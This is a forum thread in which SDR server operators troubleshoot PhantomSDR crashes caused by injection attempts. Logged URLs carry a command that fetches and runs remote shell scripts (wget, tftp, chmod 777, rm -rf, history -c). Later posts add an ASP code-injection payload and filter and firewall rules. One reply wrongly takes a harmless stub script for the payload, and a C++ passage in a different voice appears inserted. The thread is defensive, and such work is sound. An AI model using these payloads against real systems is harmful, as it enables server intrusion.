Our current SDR online list: https://sdr-list.xyz/

Security Issue: code injection attack

Started by hb3xdc, May 06, 2025, 09:22 AM


hb3xdc

Hi

My instance crashes regularly with error:

terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
  what():  filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.73%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.73+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]


To me it looks like some sort of attempted code injection attack. Does anyone have an idea how to prevent this?
Gianni - HB3XDC
WebSDR Lucerne
Sardinia SDR

Phil - NY4Q

I have not seen that yet, but below is the script (I assume).

#!/bin/bash
## sakura
## version 0.0.1 - initial
##################################################
sakura() {
 true
}
##################################################
if [ ${#} -eq 0 ]
then
 true
else
 exit 1 # wrong args
fi
##################################################
sakura
##################################################
## generated by create-stub2.sh v0.1.2
## on Fri, 28 Jun 2019 17:24:34 +0900
## see <https://github.com/temptemp3/sh2>
##################################################

https://github.com/temptemp3/sakura.sh/blob/master/sakura.sh

Bas ON5HB

Yep it's injection alright:

https://github.com/netsecfish/tbk_dvr_command_injection

More info here:

https://nvd.nist.gov/vuln/detail/CVE-2024-3721

I would check the IPs they come from and ban them.

They try to write and execute a file on your filesystem as far as I can see. But I doubt anything happens apart from a crash.
Check your drive for filenames you see in the command.
Best regards,

Bas ON5HB

Ps. the Community Edition can be found here: https://github.com/ny4qphil/PhantomSDR-Plus

hb3xdc

As far as I can see there is no file or anything like it on the drive. The IP is from the UK and I have already reported it. Is there any way to prevent this kind of stuff from being entered into the system (they crash it daily with this)? Otherwise I'm just going to remove the chatbox.
Gianni - HB3XDC
WebSDR Lucerne
Sardinia SDR

Phil - NY4Q

We can add some of the common extensions / commands to the bad word list. That should help.

You can add chmod, root, .sh, etc to the chat.cpp file then recompile the backend.

Phil - NY4Q

This will help:

Modify sendMessage() in App.svelte

function sendMessage() {
  newMessage = newMessage.replace(/[^\x00-\x7F]/g, ""); // Strips non-ASCII
  newMessage = stripText(newMessage);
  if (newMessage.trim() && username.trim()) {
    const messageObject = {
      cmd: "chat",
      message: newMessage.trim(),
      username: username,
    };
    socket.send(JSON.stringify(messageObject));
    newMessage = "";
    scrollToBottom();
  }
}

And add this function to App.svelte
function stripText(s) {
  let badStrings = ['777', 'chmod', '.sh', 'chown', 'tftp'];
  // Escape regex metacharacters so '.sh' matches a literal ".sh" and not any character followed by "sh"
  let escaped = badStrings.map(b => b.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'));
  let fixedStrings = new RegExp('\\b(' + escaped.join('|') + ')\\b', 'g');
  // Remove the listed strings, then collapse every run of spaces left behind (global flag)
  return (s || '').replace(fixedStrings, '').replace(/[ ]{2,}/g, ' ');
}

I will add this to the current build now.

hb3xdc

Hi Phil
Thanks for the code; sorry, I had not much time in the last weeks, but I have now tested it. It still has the same crash; some bad guys are trying to do this:

terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
  what():  filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.37%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.37+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]

Any idea what I still could do?
Gianni - HB3XDC
WebSDR Lucerne
Sardinia SDR

Bas ON5HB

Are you sure it's an injection?
As I found this:

https://github.com/azerothcore/azerothcore-wotlk/issues/6889#issuecomment-878552846

Describing the problem.

So the question is... what OS etc. are you running? Was it compiled with the suggested OS? And compilers?

We have seen more problems when people use something different than Ubuntu 22.04.

Why doesn't it happen to all the others? And just you? It seems to come from device.rsp... could it be Soapy?

Not much info to go on besides you repeating the error but not telling us what you use: toml, start-stop script etc.
Best regards,

Bas ON5HB

Ps. the Community Edition can be found here: https://github.com/ny4qphil/PhantomSDR-Plus

hb3xdc

I found out that you can reproduce it if you put any random stuff behind the URL:

http://sardinia-sdr.ddns.net/%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))

and it crashes with the error

terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
  what():  filesystem error: status: File name too long [//%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))]

This happens on any PhantomSDR instance I have, but somebody is penetrating sardinia-sdr.ddns.net.

At the moment I have no idea how to prevent this from happening.


If you want to try it, just post the script from this page after a / behind the URL of your server and you will see it crashing:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection#:~:text=In%20Code%20Injection%20testing%2C%20a,%2C%20e.g.%2C%20ASP%20or%20PHP.
Gianni - HB3XDC
WebSDR Lucerne
Sardinia SDR
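The error quoted above is what the throwing std::filesystem::status overload raises when stat() fails with ENAMETOOLONG, i.e. when the raw request path (query string included) is handed to the filesystem and one component exceeds 255 bytes. As an added example that is not code from PhantomSDR or from anyone in this thread, this is how a static-file handler can vet the path lexically and probe the filesystem without a throw; the function and type names are hypothetical.

```cpp
#include <filesystem>
#include <string>
#include <system_error>

namespace fs = std::filesystem;

// Verdict of vetting a URL path before it is handed to the filesystem.
enum class PathCheck { Ok, Empty, Traversal, ComponentTooLong };

struct Vetted {
    PathCheck verdict;
    fs::path rel;   // normalised path relative to the web root, set only on Ok
};

// NAME_MAX on Linux: a longer component makes stat() fail with ENAMETOOLONG,
// which the throwing std::filesystem overloads turn into filesystem_error.
constexpr std::size_t kMaxComponent = 255;

// Purely lexical vetting, no filesystem access. Names are hypothetical.
Vetted vet_request_path(const std::string& url_path) {
    // Drop the query string and fragment: "?opt=sys&cmd=..." is not a file name.
    std::string p = url_path.substr(0, url_path.find_first_of("?#"));
    p.erase(0, p.find_first_not_of('/'));           // "//device.rsp" -> "device.rsp"
    fs::path rel = fs::path(p).relative_path().lexically_normal();
    if (rel.empty() || rel.native() == ".") return {PathCheck::Empty, {}};
    for (const auto& part : rel) {
        if (part.native() == "..") return {PathCheck::Traversal, {}};  // escapes the web root
        if (part.native().size() > kMaxComponent) return {PathCheck::ComponentTooLong, {}};
    }
    return {PathCheck::Ok, rel};
}

// Existence probe that cannot throw: the error_code overload of status()
// reports ENAMETOOLONG, EACCES, ELOOP etc. as `false` instead of std::terminate.
bool safe_exists(const fs::path& p) {
    std::error_code ec;
    fs::file_status st = fs::status(p, ec);
    return !ec && fs::exists(st);
}
```

The same non-throwing pattern applies to every std::filesystem call made on a request-derived path (exists, is_regular_file and canonical all have error_code overloads).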

Phil - NY4Q

Thanks for posting that Gianni. I will try to look further into that, but I believe Bas is far beyond me in finding a solution.

Bas ON5HB

I have logged the issue:

*** longjmp causes uninitialized stack frame ***: terminate

OK, now to find the issue itself, I have some ideas... thanks for the data.
Best regards,

Bas ON5HB

Ps. the Community Edition can be found here: https://github.com/ny4qphil/PhantomSDR-Plus

Bas ON5HB

Not either....but I know the problem now.

The first sign of the string is %3C%, which equals '<', and that is injection code.

OK, found a quick and dirty method to stop it from happening, as the first part is always %3C%... so we add this to the web server start script:

iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
Any URL that has %3C% in it will be blocked by the firewall, maybe it needs tuning, but it works!!!! YES!!!!!

Beware, if you restart a lot, it adds the same line over and over.

To stop that from happening, put this before the adding line:

iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
Then it removes it first, then adds it.

Make sure that 'iptables -L' lists the line first!!! Else it may not work or be overruled.

Best to kill/delete UFW, it's sort of useless.
Best regards,

Bas ON5HB

Ps. the Community Edition can be found here: https://github.com/ny4qphil/PhantomSDR-Plus

hb3xdc

Thanks for your research, Bas, but for me it's not working:

gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory

or with sudo:

gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).
Gianni - HB3XDC
WebSDR Lucerne
Sardinia SDR

9a7aof

Hi,

my Ubuntu 22.0.4

Quote
darko@buster:~$ sudo su
[sudo] lozinka za darko:
root@buster:/home/darko# iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
root@buster:/home/darko# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       all  --  anywhere             anywhere             STRING match  "%3C%" ALGO name bm TO 65535

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
root@buster:/home/darko#

and LMDE 6

Quote
root@Siemens:/home/websdr# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       all  --  anywhere             anywhere             STRING match  "%3C%" ALGO name bm

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
root@Siemens:/home/websdr#

Is this OK?  :)

Phil - NY4Q

Quote from: hb3xdc on May 26, 2025, 10:35 PM
Thanks for your research, Bas, but for me it's not working:

gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory

or with sudo:

gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).


Just remove the deletion entry from your iptables script. It is trying to delete an entry that does not yet exist.

sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
